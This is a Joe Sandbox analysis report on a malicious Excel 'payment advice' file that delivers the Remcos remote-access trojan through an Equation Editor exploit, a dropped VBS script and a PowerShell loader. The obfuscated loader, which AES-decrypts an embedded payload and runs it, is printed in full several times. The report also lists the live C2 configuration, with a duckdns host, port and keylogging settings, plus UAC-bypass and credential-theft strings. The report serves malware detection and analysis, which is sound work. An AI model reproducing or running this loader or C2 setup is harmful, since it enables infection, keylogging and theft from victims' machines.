Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U00d6DEME TAVS#U0130YES#U0130.xls

Overview

General Information

Sample name:#U00d6DEME TAVS#U0130YES#U0130.xls
renamed because original name is a hash value
Original sample name:DEME TAVSYES.xls
Analysis ID:1482813
MD5:75bfdd13f1ba9517907d20630398fe5e
SHA1:20049b39f7b1f74ba4cd4dabf064f61d5fe28ce7
SHA256:0658815d79e2d6c10e9ca7c2d3f4a355403ad7bfe1f1c6a4d69d50a1d3dd7b04
Tags:xls
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious Excel or Word document
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found URL in obfuscated visual basic script code
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 1800 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 1536 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3248 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3336 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3376 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'') MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • RegAsm.exe (PID: 3524 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Version": "5.1.0 Pro", "Host:Port:Password": "wemberdag.duckdns.org:31388:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-LBUX79", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\createdsimplethingstogetbackteachingentirethingsaroundtheworldtogetmebackwiththefreatgreatthings_____________sesheismygirlalwayssheismy[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1862:$obj2: \objdata
  • 0x1848:$obj3: \objupdate
  • 0x1821:$obj5: \objautlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C63FEFCD.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x1862:$obj2: \objdata
  • 0x1848:$obj3: \objupdate
  • 0x1821:$obj5: \objautlink
SourceRuleDescriptionAuthorStrings
00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
      00000009.00000002.447875101.0000000003FC8000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Remcos_b296e965unknownunknown
      • 0x38fb28:$a1: Remcos restarted by watchdog!
      • 0x3900a0:$a3: %02i:%02i:%02i:%03i
      Process Memory Space: powershell.exe PID: 3376JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 3376JoeSecurity_RemcosYara detected Remcos RATJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          9.2.powershell.exe.42ed080.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
            9.2.powershell.exe.42ed080.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              9.2.powershell.exe.42ed080.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
              • 0x690a8:$a1: Remcos restarted by watchdog!
              • 0x69620:$a3: %02i:%02i:%02i:%03i
              9.2.powershell.exe.42ed080.0.unpackREMCOS_RAT_variantsunknownunknown
              • 0x630fc:$str_a1: C:\Windows\System32\cmd.exe
              • 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
              • 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
              • 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
              • 0x6316c:$str_b2: Executing file:
              • 0x641ec:$str_b3: GetDirectListeningPort
              • 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
              • 0x63d18:$str_b7: \update.vbs
              • 0x63194:$str_b9: Downloaded file:
              • 0x63180:$str_b10: Downloading file:
              • 0x63224:$str_b12: Failed to upload file:
              • 0x641b4:$str_b13: StartForward
              • 0x641d4:$str_b14: StopForward
              • 0x63c70:$str_b15: fso.DeleteFile "
              • 0x63c04:$str_b16: On Error Resume Next
              • 0x63ca0:$str_b17: fso.DeleteFolder "
              • 0x63214:$str_b18: Uploaded file:
              • 0x631d4:$str_b19: Unable to delete:
              • 0x63c38:$str_b20: while fso.FileExists("
              • 0x636b1:$str_c0: [Firefox StoredLogins not found]
              9.2.powershell.exe.42ed080.0.unpackINDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOMDetects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)ditekSHen
              • 0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7}
              • 0x62f7c:$s1: CoGetObject
              • 0x62f90:$s1: CoGetObject
              • 0x62fac:$s1: CoGetObject
              • 0x6cf38:$s1: CoGetObject
              • 0x62f3c:$s2: Elevation:Administrator!new:
              Click to see the 5 entries

              Exploits

              barindex
              Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 192.227.225.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3248, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49170
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3248, TargetFilename: C:\Users\user\AppData\Roaming\simplebeautygirlfrndhaveform.vBS

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
              Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49170, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3248, Protocol: tcp, SourceIp: 192.227.225.166, SourceIsIpv6: false, SourcePort: 80
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI53245645968011423739588623973337CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIIfj5tD9O95CJERD65QS8cgd6mKhDFXu5KnhuNUHV8eN0Bizzo6XYsPUOr/naNJ9+K8DnwkvsZljh8/jDtCBlcE7JwBlipBYNS69FMVrYo8riAT/OCm+86aVfem+jS7xh93ssL6airSk1E4+mG3y/ys93bKWl7qe/OiIfd0sR1FM9xZhEYuwuHy/AU8FfHXTeSMPl/YzZJ+ERHVh+bArXV063XruUdd/cZK/At2Cd+nbGZfGFDj29bcydLi2HTao5Px2joIFcvB02gojNaG2SWau3s/c6HFNqHbJGGUvRutXMletl29tNTCgqa0tUwol3eukX7WxBG0I6W0I89mN4k+5nR4K2AK8APbfVOX2Kvv5Tano47cej4QtGlf3mt0SPlqwZ9JReU64MQQKkvdzo84oqAoQ+HKZ5+76sSvuVPLVPNwT4waP3/VLkFCFvdaX6peTauqLmO7Enf3jzdxLsVBi7+NpZvpR8FLnBqiZzlImiogkvR17bPAS5CpYJnW/spi74gNlfkH3Qds0UlhmZe/la2ja5Mjup7w5KWxVsHB7OS7tLShSyN7PC/qbynVi6PhL80r558jq+Epf/Jw5jd2cMqIeQ4mv2U7EHxT/brTG1G9P22Aeim3ofkuv8Q/SbtoTP/20JvRjQ8WJRpM/rpy0QrrdKIDxmHOj8D6rmtRQVNLhZ+QU80DQhyY621X7HrHP/CHEzyeyQZWYMrUUzD7owZM8RgeUNb1tZcnVUx5eYVO7nU46ipcNFuuOEq7bDkKPW3S8iF+x6isuilkSnxQGLGoiQ/3UQx1KT5knk+IGE6RsunZht35yevyQ39siNJMcED7UWj/p5RW4pseMzZxQl/ER7KgeB/ga2lAverkwIuezrF3ODu4Fwu5pnQAqjKIbiK2WSd3HqQ6ElDbZDPlYJnIiorFFgTexsUy6Oe4ME8KrjwDHFPmrWUYgSixHjBrs984Mgz6L5vb7M2/1oZiU1cR0qRdZy3k3VSR+EnkjMt7QgpSt+TbAem6N1XrXX9yzuPZHT3jK7lS4aHtIloD1MMXWuIFungQbKc9KeITySZskxIxzuGSwplqK0ziNU0ELPRdi1QwF3PH5FGpGbNrOTsh2BXgal6KV70rLlImHCB/8N7+Zv4j3XQUvj7YpMsgavK4CpP2Kc0q2QBsv7EQwDeKTCM8Lho0uj59AXofd0v7Z0vxAotnN5Mo4LmIYSm7KuWnX/7BetKCLQsfM4MXEXF6te/5nneOgTKpDRxwFFl4mVtKv5tMtOpWM/IW/h9086XNQd1JCqFrA3dwaQ9H6+RTfGXHWBLLV/H2MbX+G3rK+Am8FjxJeLV3vZ/qwk0O2aTk8NsmzYZcdfcOP03B9h/iEr7Se0SP/S6mlR/0wuzt7CmAPKp/CNPz0fC/0tV0xJ8NlgvvQQvk1Zz/ZXQQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion'
